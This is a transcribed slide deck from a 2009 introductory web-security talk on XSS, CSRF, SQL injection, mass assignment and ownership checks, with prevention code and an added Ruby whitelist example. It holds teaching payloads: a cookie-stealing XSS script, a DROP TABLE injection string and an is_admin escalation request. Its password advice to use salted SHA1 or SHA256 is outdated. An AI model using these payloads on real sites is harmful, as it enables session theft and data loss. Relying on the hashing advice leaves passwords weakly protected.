
2009 Barcamp Nashville Web Security 101



A super-brief (25 minute) talk on the basics of web security. A video (with poor audio that doesn't kick in until 9 minutes in, I'm sorry) is available here:

Published in: Technology


  1. Web Security 101
  2. Who is this guy? Brian Dailey, realm3 web applications
  3. Security is serious.
  4. Even when you might think it's not.
  5. TRUST ME. Security is all about trust.
  6. Physical, Network, Server, Application
  7. XSS. The user believes you are this guy: But this guy is really watching:
  8. XSS: Methods. Non-persistent: entice the user to load a page (either by clicking a link or via a hidden frame) and inject client-side script. Persistent: save the script to the database and get users to load the page that renders it.
  9. XSS: Give me back my session!
     <script>
       document.write('<img src="me.php?cookie=' + document.cookie + '" width="1" height="1" />');
     </script>
  10. XSS. Another example: embed a form that captures a saved password, then collect it. If you can inject JavaScript or HTML, you can do all sorts of nefarious things.
  11. XSS Prevention: Always escape output. How you escape depends upon context:
      URL encoding
  12. HTML entities
  13. Whitelisting HTML tags (blacklisting is tricky!)
  14. CSRF (Cross-Site Request Forgery): exploit the server's trust of the user.
  15. CSRF. You think this is your user: But really it is:
  16. CSRF Example:
      <img src="" height="1" width="1" />
      Works especially well with GET requests, but using POST is not a surefire way to prevent this.
  17. CSRF Prevention Techniques: Authorize each user action. Don't use GET when modifying data.
  18. SQL Injection
  19. SQL Injection
      String sql = "SELECT * FROM users WHERE name LIKE '%" + name + "'";
      Attacker-supplied name: ';+DROP+TABLE+USERS--
  20. SQL Injection Prevention: This one is pretty easy: use parameterized statements. (You could also escape control characters, but there are issues with that.)
      String sql = "SELECT * FROM users WHERE name LIKE ?";
      java.sql.PreparedStatement stmt = conn.prepareStatement(sql);
      stmt.setString(1, request.getParameter("name"));
  21. Frameworks are helpful.
  22. They can come with their own set of issues.
  23. Mass Assignment
  24. Mass Assignment, Rails example:
      @user = User.find(
      @user.update_attributes(params[:user])
      If I POST user[is_admin]=1: W00t! I pwned u! Fix by using attr_accessible (in the model) or by whitelisting.
  25. Mass Assignment. Symfony: if you're using Forms, you're not vulnerable. (Kudos to Symfony.) CakePHP:
      # Anything about $this->data could be changed!
      # This makes me sad.
      $this->Post->save($this->data);
  26. Ownership
  27. Ownership Authorization, Rails:
      # bad
      @post = Post.find(params[:id])
      # good
      @post = current_user.posts.find(params[:id])
  28. Ownership Authorization, CakePHP:
      // bad
      $post = $this->Post->findById($id);
      // good
      $post = $this->Post->find(array('conditions' => array(
          'id' => $id,
          'user_id' => $this->Auth->user('id'),
      )));
  29. Ownership Authorization, Symfony:
      // bad
      $post = Doctrine::getTable('Post')->find($id);
      // good (a second where() would replace the first in Doctrine 1, so andWhere() adds the ownership condition)
      $post = Doctrine_Query::create()
          ->select('*')
          ->from('Post p')
          ->where(' = ?', $id)
          ->andWhere('p.user_id = ?', $user_id);
  30. Other Considerations
      - Rate limit user login attempts to prevent brute-force attacks.
        + Use caching (memcache) to track attempts.
      - Always hash user passwords.
        + MD5 is no good; use SHA1, SHA256 and a salt.
      Useful Resources: Potential Attacks Overview (OWASP has a ton of info!), Google Code University on Web Security, Rails Security Guide.
  31. Wrapping Things Up. DO: Assume that users can be malicious. Assume that your data is important (it should be!). DON'T: Assume your framework handles all security concerns. Assume your application is "unbreakable."
  32. Thanks! Any questions? Brian Dailey, realm3 web applications. Web: Twitter: @brian_dailey Email: Phone: 917-512-3594 slide-bg: Kudos to:
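Slides 24 and 25 describe mass assignment and the two fixes, an attr_accessible whitelist in the model or whitelisting in the controller. The following is an added example, not code from the talk or from Rails: a plain-Ruby stand-in for attr_accessible and update_attributes (the Model and User classes, the whitelist helper and the POSTED_USER request hash are all constructed here) that shows how the user[is_admin]=1 request from the slide is dropped instead of applied.

```ruby
# Minimal stand-in for a Rails-style model with an attr_accessible
# whitelist. Constructed for illustration; this is not Rails code.
class Model
  def self.attr_accessible(*names)
    @accessible = names.map(&:to_s)
  end

  def self.accessible
    @accessible || []
  end

  def initialize(attrs = {})
    @attributes = attrs.transform_keys(&:to_s)
  end

  def [](name)
    @attributes[name.to_s]
  end

  # Applies only whitelisted keys from the request hash and returns the
  # keys it refused, so a controller can log the tampering attempt.
  def update_attributes(params)
    params = params.transform_keys(&:to_s)
    allowed, rejected = params.partition { |k, _| self.class.accessible.include?(k) }
    @attributes.merge!(allowed.to_h)
    rejected.map(&:first)
  end
end

class User < Model
  attr_accessible :name, :email # is_admin is deliberately not assignable
end

# Controller-side alternative: whitelist before the model ever sees the hash.
def whitelist(params, *keys)
  keys = keys.map(&:to_s)
  params.select { |k, _| keys.include?(k.to_s) }
end

# Constructed request body: the user[is_admin]=1 POST from slide 24.
POSTED_USER = { "name" => "mallory", "email" => "m@example.invalid", "is_admin" => "1" }

def demo
  user = User.new("name" => "brian", "email" => "b@example.invalid", "is_admin" => false)
  rejected = user.update_attributes(POSTED_USER)
  { name: user[:name], is_admin: user[:is_admin], rejected: rejected,
    controller_filtered: whitelist(POSTED_USER, :name, :email).keys }
end

puts demo.inspect if __FILE__ == $0
```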